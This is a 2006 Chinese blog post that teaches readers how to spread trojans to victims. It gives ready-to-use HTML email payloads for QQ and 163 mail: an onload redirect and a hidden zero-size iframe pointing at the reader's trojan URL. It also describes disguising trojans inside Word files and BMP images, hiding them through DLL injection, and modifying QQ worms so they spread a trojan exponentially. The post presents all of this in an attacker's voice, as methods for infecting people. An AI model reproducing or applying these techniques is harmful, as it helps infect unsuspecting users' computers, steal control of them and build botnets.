随笔-211  评论-26  文章-8  trackbacks-0
1、利用QQ邮箱传播木马
这里主要点HTML格式----在里面写上以下这段代码:
<body onload="window.location='你的网页木马地址';"> </body>
当人家一打开你发过去的邮件时,就会中我们的木马.

2、利用163邮箱传播网页木马
同样,这里用HTML格式,然后填上以下代码:
</html><iframe src="你的网页木马地址" name="zhu" width="0" height="0"
frameborder="0">

3、在WORD文档中加入木马文件
这种方法非常隐蔽,在WORD文档尾加入木马文件,只要别人点击这个所谓的WORD文件就
会中木马,这种方法主要是通过把一个EXE格式的木马文件接在一个DOC文件的末尾,使
别人察觉不到木马的存在,因此使之上当受骗.具体实现方法,比较复杂.本人也在进一
步的研究之中.相信在不久这种方法就会流行起来.现在主要被一些高手使用.

4、用Z-file伪装加密木马程序
z-file伪装加密软件是台湾华顺科技产品,其经过将文件压缩加密之后,再以bmp图像
文件格式显示出来,扩展名是bmp,执行后是幅普通的图像.黑客会将木马程序和小游戏
合拼,再用z-file加密及将此"混合体"发给受害者,由于看上去是图像文件,受害者往
往不以为然,打开后又只是一般的图片,最可怕的地方还在于就连杀毒软件也检测不出
它内藏木马.

5、伪装成应用程序扩展组件
此类属于最难识别的特洛伊木马,也是骗术最高的木马,当然技术实现也有相当的难度
由于涉及到编程,所以我这里只简单介绍原理,以供参考.
采用内核插入式的嵌入方式,利用远程插入线程技术,嵌入DLL线程,或者挂接PSAPI,实
现木马程序的隐藏.

6、通过QQ病毒,QQ蠕虫,QQ尾巴或邮箱病毒,蠕虫进行传播
相信利用这些技术进行传播木马的速度是最快的.这里要下载病毒,蠕虫源代码.进行
分析.修改.加入我们的网页木马地址.然后传播到网上,这样就会一传十,十传百,指数
级上升,自动为我们传播木马.这种传播速度是惊人的.网上也可找到相关QQ蠕虫制作
器,菜鸟朋友就可以直接制作自己的带有网页木马的蠕虫了.最近的唐山黑客就是利用
QQ尾巴传播自己的木马,感染并操控了四万多台民用电脑.进行对北京的一家音乐网站
进行分布式DDOS攻击.利用该技术是相当高级的,速度也是最快的.


posted on 2006-08-05 10:34 dragon 阅读(153) 评论(0)  编辑  收藏 所属分类: 黑客之盾